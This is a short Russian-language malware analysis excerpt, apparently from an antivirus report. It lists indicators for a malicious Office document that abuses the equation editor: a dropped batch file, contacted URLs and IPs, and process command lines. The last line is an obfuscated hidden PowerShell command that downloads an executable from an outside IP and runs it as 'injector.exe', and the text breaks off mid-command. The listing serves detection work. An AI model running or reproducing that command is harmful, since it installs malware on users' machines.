Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c ""%APPDATA%\windowsdeleted.bat" "
- %APPDATA%\windowsdeleted.bat
- <Текущая директория>\65831000
- <PATH_SAMPLE>.xls
- '19#.#27.183.144':80
- http://19#.#27.183.144/we/Microsoftdetectedcacheonpcsotheygoingtodeleteentirehistorytoclean.Doc
- http://19#.#27.183.144/we/windowsdeleted.bat
- '%ProgramFiles%\microsoft office\office14\winword.exe' -Embedding
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NoP"r"o"f"ile -Executi"o"nPolic"y" Bypass -W"i"ndowStyle Hidden -C"o"mmand "I"nv"o"ke-WebReq"u"est http://107.161.81.132/M1112T/wininit.exe -"O"ut"fi"le in"j"ector.exe; St"art-Process in"j"ect...